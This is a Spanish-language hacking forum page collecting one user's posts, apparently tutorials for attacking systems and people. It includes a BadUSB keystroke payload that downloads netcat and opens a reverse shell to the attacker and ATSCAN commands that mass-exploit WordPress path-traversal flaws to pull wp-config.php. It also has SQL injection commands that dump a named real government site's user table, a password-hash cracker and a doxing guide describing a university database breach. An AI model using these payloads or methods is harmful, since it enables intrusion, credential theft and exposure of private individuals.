Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - BrowserNet

#1
Hacking / Penetration testing con BadUSB
Septiembre 27, 2019, 05:51:51 PM
Hola estimados hermanos de underc0de es un placer nuevamente estar con ustedes luego de 2 años de estar ausente del foro.
Un saludo grande para los administradores, moderadores y todos los usuarios en general, un fuerte abrazo para cada uno de ustedes.

En esta oportunidad les enseñare a crear sus propios Scripts para su dispositivo de Hackeo BAD USB(rubber ducky)

¿Que es Bad USB?

Bad USB es un dispositivo USB que se comporta como otro dispositivo de teclado automatizado, que permite utilizar este dispositivo de manera maliciosa para ataques de pentesting de manera local.

Características:


    Microcontroller: ATmega32u4
    Clock Speed: 16 MHz
    Operating Voltage: 5V DC
    Digital I/O Pins: 10
    PWM Channels: 4
    Analog Input Channels: 5
    UART: 1
    I2C: 1
    Micro USB: 1
    Flash Memory: 32 KB of which 4KB used by bootloader
    SRAM: 2.5 KB
    EEPROM: 1 KB
    USB ATMEGA32U4 Development Board Module For Arduino Leonardo R3[/li]

Este dispositivo se puso de "moda" en el año 2014 y hasta el día de hoy se sigue utilizando por su eficacia.

Existe un gran demanda de estos dispositivos en varias plataformas de e commerce a nivel mundial.



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

A continuación vamos a descargar el IDE Arduino.
(Dependiendo su sistema y arquitectura)

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




Instalación:

tar -Jxf arduino-1.8.9-linux64.tar.xz
cd arduino-1.6.12/
./install.sh

Antes de comenzar a crear el script vamos a repasar un poco de arduino.

¿Qué es Arduino?

Arduino es una plataforma y, como tal, dispone de varios elementos: hardware, software y lenguaje de programación. Este libro pretende ampliar tu lenguaje de programación y, teniendo en cuenta la base que hemos visto, no necesitamos añadir más conceptos sobre electrónica y hardware, pero si sobre el IDE de Arduino.

Estructuras de control de flujo repetitivas

Este tipo de estructuras son también conocidas como «bucles»; se diferencian de las estructuras no repetitivas en que, siempre y cuando se cumpla la condición o condiciones, se ejecutan las líneas de código una y otra vez sin salir de la estructura

While

Esta estructura ejecuta las instrucciones que se encuentran entre sus llaves de apertura y cierre. ¿Cuántas veces? Se ejecutarán mientras la condición especificada se cumpla, sin ejecutarse ninguna otra línea de código que se encuentre fuera de la estructura.
while(condición)
{
//Instrucciones que se ejecutan mientras se cumpla la condición
}

Ejemplo:




Programando en Arduino

Ejemplo 1:



Ejemplo 2:



Aprende arduino aquí:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Una ves instalado el IDE Arduino, ingresamos nuestro Bad USB y buscaremos nuestra placa para poder iniciar la compilación y depuración de nuestro proyecto.



Creando nuestro Backdoor con NC en Arduino IDE

Antes de empezar a explicar un poco el  código fuente debo aclarar que la victima tiene Linux Bash Shell instalado en su sistema y aprovechare esas características para acceder al sistema.




Explicando el código fuente:

----------------------------------------------------------------------------------------------------------------------

Keyboard.begin();
// Waiting 500ms for init
  delay(500);

  delay(3000);

  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta(KEY_LEFT_GUI);
  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta(114);
  Keyboard.releaseAll();
----------------------------------------------------------------------------------------------------------------------

Estamos indicando el dispositivo pulsee la tecla WINDOWS(KEY_LEFT_GUI) y dando Enter(144) en un tempo determinado de 3 segundos.

Algunas teclas expresiones de teclado:
KEY_LEFT_CTRL
KEY_LEFT_SHIFT
KEY_LEFT_ALT
KEY_LEFT_GUI
KEY_RIGHT_CTRL
KEY_RIGHT_SHIFT
KEY_RIGHT_ALT
KEY_RIGHT_GUI
KEY_UP_ARROW
KEY_DOWN_ARROW
KEY_LEFT_ARROW
KEY_RIGHT_ARROW
KEY_BACKSPACE
KEY_TAB
KEY_RETURN
KEY_ESC
KEY_INSERT
KEY_DELETE
KEY_PAGE_UP
KEY_PAGE_DOWN
KEY_HOME
KEY_END
KEY_CAPS_LOCK
KEY_F1
KEY_F2
KEY_F3
KEY_F4
KEY_F5
KEY_F6
KEY_F7
KEY_F8
KEY_F9
KEY_F10
KEY_F11
KEY_F12

Equivalencias de otras unidades de tiempo en milisegundos

Un centisegundo equivale a 10 milisegundos.
Un decisegundo equivale a 100 milisegundos.
Un segundo equivale a 1000 milisegundos.
Un minuto equivale a 60 000 milisegundos.
Una hora equivale a 3 600 000 milisegundos.
Un día equivale a 86 400 000 milisegundo
----------------------------------------------------------------------------------------------------------------------
delay(500);
Keyboard.print("cmd");
delay(500);
typeKey(KEY_RETURN);
delay(500);
Keyboard.print("wget 192.168.0.4&nc64.exe");
typeKey(KEY_RETURN);
delay(50);
Keyboard.print("START nc64.exe 192.168.0.4 8888 /e cmd.exe /d & exit");
typeKey(KEY_RETURN); 
delay(500);
Keyboard.print("exit");
typeKey(KEY_RETURN);   
}
----------------------------------------------------------------------------------------------------------------------

Keyboard.print - Aquí añadiremos los valores que deseamos digitar de manera automatizada
typeKey(KEY_RETURN) - Boton Enter.

como podemos ver en el código anterior estoy indicando que descargue un ejecutable NC.exe con la dirección IP y el puerto de escucha de mi ordenador, una ves que se conecte me abrirá el CMD de nuestra victima.

Ejecutamos Netcat en nuestro ordenador para la conexión.

Código: php
root@kali:~# nc -l -p 8888


Ahora ingresamos el USB en la PC de nuestra victima para realizar nuestra prueba de concepto.



Reverse Shell CMD



De manera automatizada hemos conseguido acceder al sistema de nuestra victima.
No obstante también pueden subir un backdoor .exe de msfvenom y listo.

Les dejo algunos scripts que pueden utilizar para sus pruebas de concepto:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Existen herramientas que automatizan los payloads , pero quise hacer este articulo para que comprendas la estructura de un Payload en Arduino.

Saludos.


#2
Saludos hermanos de underc0de, estuve revisando algunos mensajes de algunos usuarios que me pedian que elabore un POST sobre "Analisis de vulnerabilidades en el CMS JOOMLA", bueno empecemos.

Joomlavs es una aplicación de Ruby que puede ayudar a automatizar la evaluación de lo vulnerabilidades. puede buscar vulnerabilidades en los componentes, módulos y plantillas, así como las vulnerabilidades que existen dentro de Joomla en sí.

Descargamos el repositorio:
Código: php
git clone https://github.com/rastating/joomlavs.git


Instalamos Bundler.

Código: php
sudo gem install bundler && bundle install


Instalamos algunas dependencias, entre ellas Nokogiri

Código: php
sudo apt-get install build-essential patch
sudo apt-get install ruby-dev zlib1g-dev liblzma-dev libcurl4-openssl-dev




Auditaremos el servidor de manera "Estandar"

Código: php
root@kali:~/joomlavs# ./joomlavs.rb --scan-all --url http://www.paginaweb.com/





Encuentran los modulos vulnerables, se van a Exploit DB y al final un buen Pentest.
Son las 03:04 de la madrugada y no voy a testear exploit por exploit xD!

available databases [12]:
  • ADMISION
  • cacti
  • claro_unsa
  • claroline
  • DB_CERCAP
  • information_schema
  • mysql
  • ocsweb
  • seis
  • SICONIN
  • test
  • unsa_AA0001



    En mi opinión esta herramienta es muy util.

    Saludos.



#3
ATSCAN

Advanced Search / Dork / Mass Exploitation Scanner :P



ATSCAN, es un framework automatizado, que nos permite encontrar servidores vulnerables por medio de avanzadas metodologías de escaneo, por otra parte nos permite a su vez testear si el servidor es vulnerable o no.

Sin duda una herramienta que nos puede ahorrar mucho tiempo en nuestras auditorias cuando no dispongamos de un tiempo prolongado, deben tener en cuenta que la búsqueda se define por los "Motores" como:

Google / Bing / Ask / Yandex / Sogou

Ya explicado como funciona la herramienta, pueden ver las funciones que tiene ATSCAN.

Descripción:

Motor de búsqueda Google / Bing / Ask / Yandex / Sogou
Mass Dork Busqueda
Múltiples escaneos instantáneos.
Explotación masiva
Usa proxy.vulnerables mediante "DORKS"
Agente de usuario aleatorio.
Motor aleatorio.
Extern comandos de ejecución.
Escáner XSS / SQLI / LFI / AFD.
Filtre los sitios wordpress y Joomla en el servidor.
Buscar la página de administración.
Decodificar y codificar Base64 / MD5
Escaneado de puertos.
Extraer IPs
Extraiga correos electrónicos.
Detección automática de errores.
Detección automática de Cms.
Datos de correos.
Repetidor de secuencia automática.
Validación.
Publicar y obtener el método GET

Descarga:

Código: php
root@kali:~# https://github.com/AlisamTechnology/ATSCAN.git


luego de descarga el paquete de ATSCAN, procederemos a entrar a su carpeta respectiva y establecer permisos al archivo principal.

Código: php
root@kali:~# cd ATSCAN
root@kali:~/ATSCAN# chmod +x ./atscan.pl


posteriormente pasaremos a darle permisos al archivo de instalación y ejecutarlo.

Código: php
root@kali:~#  chmod +x ./install.sh 
root@kali:~#  ./install.sh


luego de instalar todos las depencias que necesita ASTCAN, pueden ejecutarlo de la siguiente manera para probar, si no tienen ningun error, de la siguiente manera:

Código: php
root@kali:~# atscan




Como vemos la herramienta nos carga correctamente, si ustedes añaden la opción: atscan --help podrán ver las formas de uso que pueden utilizar.



como pueden ver, en la imagen no nos muestra las demás opciones porque son demasiadas, pero ustedes podrán verlo en su terminal, o simplemente pueden visitar la pagina Github donde se encuentra la herramienta:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


NO quiero ser despreciativo con mis palabras, pero eh visto muchos tutoriales hace meses y hasta ahora que ejecutan el siguiente argumento para elaborar sus tutoriales:

atscan --dork "eventos.php" --level 10 --xss

voy a explicar esta metodología es ordinaria:

--dork = en ese parametro añadiremos la dork que deseamos realizar la busqueda.

--level = la cantidad de niveles de escaneo que queremos que se realice.

--xss = especificamos buscar solo fallas "CROSS-SITE-SCRIPTING"

Código: php
 [::] TEAM:: ALISAM TECHNOLOGY
[::] TOOL:: ATSCAN SCANNER [V 11.0]
[::] PATH:: /ATSCAN/atscan.pl
[::] PERL:: [v5.24.1]
[::] SYST:: [linux i686-linux-gnu-thread-multi-64int]
[::] PROXY:: [No Proxy]
[::] SCAN:: [XSS]
[::] ENGINE:: [DEFAULT BING bn-IN]
[::] DORK:: [eventos.php?]
[::] LEVEL:: [10]



Esto se entiende perfectamente, lo explicado arriba pero hay algo que no te explican en tutoriales ordinarios lo siguiente.

en primer lugar  la búsqueda se realiza con "BING" en un  rango de PAÍS IN = India, ahora me pregunto si nosotros deseamos realizar la búsqueda  de servidores de nuestro PAIS O con un dominio determinado, nos arrojarán ello?
la respuesta es no, te buscara dominios de ese país.

vamos a elaborar lo siguiente, una búsqueda por medio de un indexeador especifico en mi caso escogí la opción 2, que es "GOOGLE":

Esto se entiende perfectamente, lo explicado arriba pero hay algo que no te explican en tutoriales ordinarios lo siguiente.

en primer lugar  la búsqueda se realiza con "BING" en un  rango de PAÍS IN = India, ahora me pregunto si nosotros deseamos realizar la búsqueda  de servidores de nuestro PAIS O con un dominio determinado, nos arrojarán ello?
la respuesta es no, te buscara dominios de ese país.

vamos a elaborar lo siguiente, una búsqueda por medio de un indexeador especifico en mi caso escogí la opción 2, que es "GOOGLE":


Código: php
root@kali:~# atscan --dork "noticias.php?" --xss --level 10 -m 2


[::] TEAM:: ALISAM TECHNOLOGY
[::] TOOL:: ATSCAN SCANNER [V 11.0]
[::] PATH:: /ATSCAN/atscan.pl
[::] PERL:: [v5.24.1]
[::] SYST:: [linux i686-linux-gnu-thread-multi-64int]
[::] PROXY:: [No Proxy]
[::] SCAN:: [XSS]
[::] ENGINE:: [GOOGLE dz]
[::] DORK:: [noticias.php?]
[::] LEVEL:: [10]

-m = 2  >> Google

la diferencia de google, es que por mas que te conectes a un servidor de otro país, la palabra buscada siempre sera "indexeada" y tu servidor reconocido por ende los resultados serán orgánicos.
 
estas son las opciones que puedes utilizar para escoger a tu indexeador.

[Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all]

Continuando con el escaneo podemos observar que hemos encontrado un servidor vulnerable, en el primer escenario tenemos una vulnerabilidad "MYSQL" expuesto a una explotación SQL INJECTION, se preguntaran el porque, es porque hemos utilizado una dork con el ultimo termino "?" acompañado de nuestra búsqueda personalizada.



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Testando la vulnerabilidad mediante SQLMAP:



(REPORTADO)

bastante útil verdad, una búsqueda aleatoria, ahora probemos encontrando un servidores en wordpress vulnerables.
Utilizaremos el exploit que afecta un tema de wordpress conocido como /ypo-theme/

Código: php
##############################################################
# Exploit Title: WordPress Theme ypo-theme Arbitrary File Download Vulnerability
# Dork : inurl:/wp-content/themes/ypo-theme/
# Date : 2016/07/25
# Tested on : Kali Linux 2
# Category: webapps
##############################################################
#
# http://www.site.com/wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2F..%2Fwp-config.php
#############################################################


Añadiremos a la terminal:

Código: php
atscan --dork "inurl:/wp-content/themes/ypo-theme/" --level 100 -m 2 --exp "/wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2F..%2Fwp-config.php" --wp --wpafd


inurl:/wp-content/themes/ypo-theme/ >> Búsqueda de directorios del tema
--level >> la cantidad de niveles de escaneo que queremos que se realice.
--exp  >> Exploit en nuestro caso:

/wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2F..%2Fwp-config.php


[::] TEAM:: ALISAM TECHNOLOGY
[::] TOOL:: ATSCAN SCANNER [V 11.0]
[::] PATH:: /ATSCAN/atscan.pl
[::] PERL:: [v5.24.1]
[::] SYST:: [linux i686-linux-gnu-thread-multi-64int]
[::] PROXY:: [No Proxy]
[::] EXPLOIT:: [1 Exploit(s)]
[::] SCAN:: [AFD]
[::] GET:: [WP sites]
[::] ENGINE:: [GOOGLE bs]
[::] DORK:: [inurl:/wp-content/themes/ypo-theme/]
[::] LEVEL:: [100]



el resultado fue impresionante, entraremos a un link para comprobar si tenemos el documento sensible WP.

Ejemplo deben añadir el exploit de esta manera en su navegador:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



continuamos, una ves descargado el archivo vamos abrirlo:



Su uso es fácil, si sabes comprender algunos argumentos necesarios.
si desean explotar otros "0days", pueden ingresar al siguiente enlace:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Un regalo de mi parte:


Código: php
atscan --dork ""Index of" +/wp-content/themes/IncredibleWP/" --level 100 -m 2 --exp "/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php" --wp --wpafd



"Index of" +/wp-content/themes/IncredibleWP/"
"Index of" +/wp-content/themes/ultimatum"
"Index of" +/wp-content/themes/medicate/"
"Index of" +/wp-content/themes/Avada/"
"Index of" +/wp-content/themes/beach_apollo/"

Exploit: "/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"


Happy Hacking!

un consejo personal

Como sabemos Google es un servicio de indexación  de paginas web's, entre muchos datos que se alojan cuando utilizamos dicho servicio de manera respectiva, el procedimiento de google, es una búsqueda respectiva de la palabra "noticias.php?id=" que recopila el código fuente de información de todas las plataformas web que contengan la palabra "noticias.php?id=" y obtener el resultado de las mismas.

Hace mucho tiempo elabore algunos POST relacionado a la auditoria de plataformas web de forma manual, por medio de distintos métodos para encontrar vulnerabilidades que un Escaner no pueden encontrar, si deseas aprender esta metodología puedes visitar el siguiente articulo:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/2015/11/como-debo-empezar-para-auditar-un.html

Si deseas aprender como utilizar las dorks de google manualmente, los invito a leer el siguiente articulo:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Hoy en día, se están creando muchos "Frameworks" y herramientas que nos permiten optimizar todo este proceso, pero con solo un 70 % de posibilidades positivas, ya que una herramienta solamente sigue patrones establecidos, y auditar de forma manual, lleva todas tus capacidades de experiencia al limite para poder encontrar un agujero de seguridad hasta en la sopa.


Saludos!

#4
Off Topic / !!Regrese hermanos !!!!
Febrero 13, 2017, 01:28:00 PM
Is come back ! hermanos regreso el TioCyberPunks a publicar mas POST  8) !!
cuantos me extrañaron :(
#5
Saludos compañeros estoy entrando al mundillo de la programación enfocándome en el lenguaje C# ya que para mi es un lenguaje muy sencillo de aprender, ustedes saben a lo que me refiero.

Lo que deseo es proteger el código fuente del ejecutable, antes de venderlo a un cliente.
se que esa respuesta la puedo encontrar en google, pero prefiero guiarme de personas de confianza y sobre todo de gente experimentada en este tipo de información, con mis hermanos.


Espero me ayuden.
un saludo.
#6
Off Topic / Me despido.
Diciembre 11, 2016, 05:59:16 AM
Buenos dias familia de underc0de, se que a muchos no les importara y otros simplemente les agradara la noticia pero me alejare del foro por motivos personales y algunos puntos que no me agradan de la comunidad.

Gracias por su recibimiento, estoy en deuda con todos.



Saludos.

#7
Hacking / SQL Inyeccion con DarkMySQLi
Diciembre 07, 2016, 03:25:07 AM


DarkMySQLi es una herramienta de código abierto creada en python, que nos permite elaborar un ataque de SQL INJECTION de forma automátizada y extraer la información de las base de datos de una web.

Link de descarga : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vamos a la acción



El primer paso que haremos primero sera encontrar la web vulnerable en este caso utilizare la siguiente :

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Ejecutaremos el siguiente comando para el testeo de la web :

Código: php
python darkMySQLi.py -u "http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3" --findcol




como vemos nos voto la información principal para saber si es vulnerable a la Inyección DarkMySQLi  :

[!] darkMySQLi URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

luego que sabemos que es vulnerable a la inyección pondremos el siguiente:

Código: php
python darkMySQLi.py -u "http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3+AND+1=2+UNION+SELECT+1,2,darkc0de,4--" --full


(solo reemplazamos el numero " 3 " por " darkc0de "




Como vemos nos a votado las columnas de las base de datos clasificándolas por cada uno de ellas en sus respectivas "tablas" de manera que podamos identificarlos fácilmente los datos almacenados.

Lo que haremos a continuación sera dumpear las columnas de los usuarios:

Código: php
python darkMySQLi.py -u "http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3+AND+1=2+UNION+SELECT+1,2,darkc0de,4--" --dump -D regionsanmartin_gob_pe -T usuarios -C nomb_usuario,pass,tipo_usuario




Imagen completa de usuarios



Espero les aya gustado mucho el Post, un saludo y un abrazo desde PERU"
#8
Python / Brute force en HASH MD5 Wodpress old
Diciembre 04, 2016, 08:22:08 AM
Saludos gente de underc0de, buenos dias sigo sin dormir y estoy pensando en hacer post cortos en el foro sin colgarlos a mi blog, si no directamente postearlos aqui con la comunidad  8)

en fin, he estado investigando en el foro que muchos usuarios nuevos piden como descifrar el robusto HASH de wordpress, de ante mano deseo añadir este articulo ha pedido de nuestros nuevos colegas,

Vamos a guardar el archivo con extensión python en nuestro sistema.

Código: php
#!/usr/bin/python
#--------------------------------------------------------
#~Wordpress Hash Cracker
#~By Cyb3rw0rM
#~Visit us on facebook for more scripts: https://www.facebook.com/BackTrack.Fan.Page
#~We love Pentesting
#--------------------------------------------------------
from passlib.hash import phpass
import time
import sys
import threading
#--------------------------------------------------------
class bcolors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
#--------------------------------------------------------
def logo():
    print bcolors.WARNING+ '''       


   ______      __   _____               ____       __  ___
  / ____/_  __/ /_ |__  /______      __/ __ \_____/  |/  /
/ /   / / / / __ \ /_ </ ___/ | /| / / / / / ___/ /|_/ /
/ /___/ /_/ / /_/ /__/ / /   | |/ |/ / /_/ / /  / /  / / 
\____/\__, /_.___/____/_/    |__/|__/\____/_/  /_/  /_/   
     /____/                                               
          Wordpress Hash Cracker
     By Cyb3rw0rM
       #BackTrack Linux Fan Page
'''
logo()
#--------------------------------------------------------
hash =  raw_input("Hash > ") #~exemple : $P$BNUagMlYbp6Zr.yCTsszsPhco663Wf0
passl = "wordlist.txt" #~change it by wordlist name
threads = 1
try:
    plist = open(passl).readlines()
except:
    print bcolors.FAIL + "| We cant find 1 required list !"
#--------------------------------------------------------
def crack(password):
    hashed = phpass.verify(password, hash)
    hashedpass = str(hashed) + ":" + str(password)
    if hashedpass == "True:" + password :
    print bcolors.OKGREEN + "+---------------------------------------+"
    print bcolors.OKGREEN + "| Operation Completed !"
    print bcolors.OKGREEN + "| HASH > " + " " + hash
    print bcolors.OKGREEN + "| password >" + " " + password
    print bcolors.OKGREEN + "+---------------------------------------+"
    sys.exit(1)
#--------------------------------------------------------
print bcolors.OKBLUE + "+---------------------------------------+"
print bcolors.OKBLUE + "| Cracking Please Wait ..."
print bcolors.OKBLUE + "| Loaded %s passwords !" % len(plist)
print bcolors.OKBLUE + "+---------------------------------------+"
for password in plist :
    password = password.rstrip()
    for i in xrange(threads):
        t = threading.Thread(target=crack(password))
        t.start()
#--------------------------------------------------------


Una ves descargado, debemos tener nuestro diccionario en nuestro caso debemos llamarlo "wordlist.txt" ya que esta "relacionado" con el objeto passl, bueno usted lo puede modificar pero en fin.

Utilizare este diccionario para elaborar la prueba de concepto, es corto el diccionario ya que solo probaremos la funcionalidad de la herramienta.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

nuestro hash de prueba es: $P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/



El hash fue descifrado con éxito, usted puede utilizar un diccionario extenso, pero ojo eso dependerá de la capacidad de tu computador. 
espero les halla gustado este POST.

posdata: me animo a ser moderador de un área, cualquier consulta estoy disponible claro, si nuestro buen hermano y administrador @ANTRAX lo permite.
Un Saludo.
#9
Seguridad / Aprendiendo el arte del Doxing intermedio
Diciembre 04, 2016, 02:24:08 AM



Saludos mis hermanos de underc0de. este  POST les encantara, esta oportunidad enseñare algunos métodos de doxing la cual nos puede servir de utilidad para investigar a una persona detrás de una identidad falsa o seu-identidad,para obtener todos los datos reales de nuestra victima como:


    Nombres y apellidos
    Dni
    Edad
    Sexo
    Centros de educación
    Identificación de correo electrónico
    Dirección de ubigeo
    Número de teléfono
    Amigos en común
    Familiares

¿Que es el doxing o doxeo?

En esta oportunidad quisiera darle paso a el concepto de un amigo mio con el seudónimo :
Hiro Maxwell , el cual me enseño hace poco como se elaboraba un escenario de doxeo y me gustaría agradecerle en este humilde POST su enseñanza que me brindo, ya que hasta el día de hoy me ha servido para mis investigaciones sobre personas fraudulentas.Doxing es obtener la mayor cantidad de datos posibles acerca de una persona/objetivo a partir de UNO,POCOS o MUCHOS datos (osea, a partir de cualquier cosa).

De acuerdo a ello podemos definir que el doxing es un ataque dirigido a datos mínimos de un objetivo la cual se pasara en una serie de investigaciones obteniendo datos grandes de datos pequeños.

Hoy en día existen muchas aplicaciones web, que nos pueden ayudar a facilitar la búsqueda de personas que nos puede ser de gran utilidad para nuestras investigaciones, no obstante podemos aprovechar  "Google", ya que gracias a este buscador tenemos millones de palabras indexeadas que nos pueden facilitar mas aun nuestro trabajo, de igual manera google ah añadido una búsqueda de imágenes que puede ser el santo brial para los Doxing.

En esta prueba de concepto  no haré la búsqueda con un alias  o personas por seguridad, me enfocare en algo mas liviano como alguien con el seudónimo "RootByte", la cual me autorizo su nombre en esta prueba,haré como si no lo conociera y solo me enfocare en buscar el seudónimo mencionado. bueno vayamos a la acción.

Escenario de investigación

Como bien dije hace momentos google puede ser una arma secreta muy creativa si se sabe utilizar los parámetros de búsqueda correctos, lo que haremos sera ver si el tal RootByte tiene una cuenta de facebook o fan page relacionada,

RootByte site:facebook.com



en solo añadir una pequeña búsqueda de nuestro objetivo enfocada en la red social Facebook, podemos observar mas de 3,260 resultados que nos pueden facilitar nuestra investigación en esa red interna, si el objetivo tuviera el nick en su perfil ya sabríamos quien es, pero como sabemos que nuestro objetivo es una persona con algo de popularidad en el ambiente lo que haremos sera utilizar una búsqueda en Plus Google, que es el servidor de cuentas de Gmail enlazadas a canales de Youtube y blogs.

RootByte site:plus.google.com



como vemos observar hay un diminutivo adjunto a RootByte & Johnny, lo que hare sera entrar a la cuenta y ver que información puedo obtener mas aya de un nombre que puede ser real.



Como vemos el objetivo tiene  un solo video, pero sean observadores algunas personas por descuido dejan mas datos de lo que pueden ser aprovechados como por ejemplo, arriba nos aparece un logotipo de Facebook,Google y un enlazado a un sitio web.





oh :( , ya no existen esas cuentas o quizás fueron removidas u editadas, ya que esos datos datan de hace mas de 2 años, que en su tiempo pudo ser jugosa, entonces seguiremos con nuestra investigación hasta encontrar el nombre del objetivo, como sabemos Johnny es un diminutivo de Jhonathan, entonces enfoquemosnos en  buscar el nombre Jhonathan adjuntado con RootByte en google.




podemos observar que hay mas de 1600 resultados de esas palabras adjuntas con el nombre del seudonimo RootByte llamado Jhonathan Paz

Algunas web asociadas del objetivo:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Existen servidor web que nos felicitaran nuestra búsqueda en redes sociales donde mayormente las personas tienen un error de publicar mas de lo que se debe.



Skypepese: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Para mi esta web es una de mas completas en redes sociales ya que podemos obtener una búsqueda manual del objetivo, ya que al buscar un red social nos arrojara el dork de búsqueda que la mayoría de estos servicios tiene como estructura,en la cual podemos intelectuar de manera muy sencilla.

Pipl No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

de igual manera este servicio sin duda seria de gran ayuda ya que nos lanzaría resultados aleatorios de las web de red social mas utilizadas con gráficos que nos serian de ayuda.



Otros servicios donde pueden realizar una buena búsqueda son las siguientes: 

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta >>> consta con varias búsquedas de países donde nos resultara de maravilla.

Entre mucha mas información que obtuve de mi objetivo utilizando búsquedas mas avanzadas ya que obtenido datos de familiares, novia, ubicación de real, entre otras las cuales no puedo mostrar por respeto al acuerdo que se hizo con RootByte.

Supongamos que no hemos realizado nada de la investigación y solo tenemos una foto del objetivo:



como bien sabemos google ha implementando una búsqueda nueva que es por Imagen, lo que haremos sera subir esta foto a nube del buscador y esperar los datos que nos arroje.



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

si nuestro objetivo que deseamos buscar tiene la foto en una referencia de una cuenta de red social o simplemente añadido en un contacto de su entorno, daríamos con el bingo !, en nuestro caso ya sabemos quien es esta persona y empezaríamos a recopilar mas información de la que sabemos o también podemos utilizar una herramienta de recopilación mas grande de informathion gathering
llamado "Maltego"



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

En mi caso hace poco hice un doxing a una persona "X",pero primero me enfoque a un objetivo familiar que me ayudo a encontrarlo , esta es una FOTO de un Doxing real hecho por mi persona.





este objetivo fue una persona "Familiar" , que me brindo ubicar a mi objetivo central, en mi caso utilice algunas técnicas de google,buscadores de redes sociales y maltego para rematar al objetivo mediante un análisis estructurado.



de acuerdo con la investigación de las personas familiarizadas al objetivo que esta oculto por su seguridad, pude obtener todos los datos de esa persona, como DNI,ubicación,familiares,casa,teléfonos,entre muchas cosas privadas de el, y para darle el tiro de gracia a mi objetivo entre a la BASE DE DATOS de su universidad  para encontrar los datos y me confirmaron que si era el objetivo correcto :)

Vulnerabilidad nueva en la plataforma reciente de dicha universidad :

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

hace poco hice un post sobre como un dump y una red social nos puede ayudar de mucho para encontrar y obtener datos de personas :

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

pero como lo dije no mostrare datos de las personas, porque no quiero perjudicar a nadie con este POST, porque si lo hubiera hecho ya los hubiera subido a las web conocidas de datos de Doxing:




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Pero en mi caso, no puedo hacerlo ya que un estimo a este colega mio y no quiero perjudicarlo en nada, ya que tengo una amistad de años con este tipo, pero lo mejor seria alejarme un poco tiempo para que se calmen las aguas y volver a retomar la amistad dejando en claro algunos puntos.

Espero les aya gustado este POST, deseo aclarar que el doxing es un rama de investigación de como uno puede pensar e investigar del modo que sea del agrado del usuario, SALUDOS

#10


Saludos fieles lectores en esta oportunidad les traigo  una nueva herramienta salida del horno, que nos permite optimizar el proceso de robo de sesión por medio del código QR, hace una semana tuve un pequeño concurso en mi salón entre 3 proyectos innovadores, yo había elaborado un Software de identificación de medidas dactilares creado en Csharp conectado a un motor de base de datos como "SQL SERVER"  + SDK digital personal, por lo cual tenia 2 grandes rivales.

un proyecto de realidad aumentada y otro basado en suscripción e inicio de sesión de usuarios por medio de código QR.

El ultimo día de exposición era un debate, en la cual se tenia que ver la manera de como matar el proyecto del contrincante buscando que fallas puede tener, entonces comente sobre el Robo de sesiones QRJacking.



Descarga:

Código: php
root@kali:~#  git clone https://github.com/OWASP/QRLJacking.git
root@kali:~#  cd QRLJacking/QrlJacking-Framework
root@kali:~#  pip install -r requirements.txt




Luego de haber descargado los archivos e instalado los requerimientos de las librerias en python, pasaremos a ejecutarlo:

Código: php
root@kali:~#  python QRLJacker.py




Lo que haremos sera añadir la opción nuevo 1, Chat Applications, nuevamente escogeremos la opción 1 que es "WhatsApp", luego de ello nos aparecerá lo siguiente :

Port to listen on (Default 1337) :

Nos dice que puerto de escucha deseamos agregar para que corre la plataforma, en mi caso le añadí el puerto 8081.

Muy bien una ves hecho todo el procedimiento les saldra lo siguiente:



vemos que nos abrió una pestaña en firefox con la web original: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

de igual manera en la terminal vemos que se generan varios reemplazos del archivo tmp.png, para resumir esto es que en la plataforma de whatsapp web cada 10 segundos se genera otro nuevo código QR por ende otra imagen y QRLJacking actualiza esa imagen en vivo para que la conexión sea exitosa.



Entonces como esta es una prueba de Test, deje la index.html de whatssap generado por QRLJacking por default.

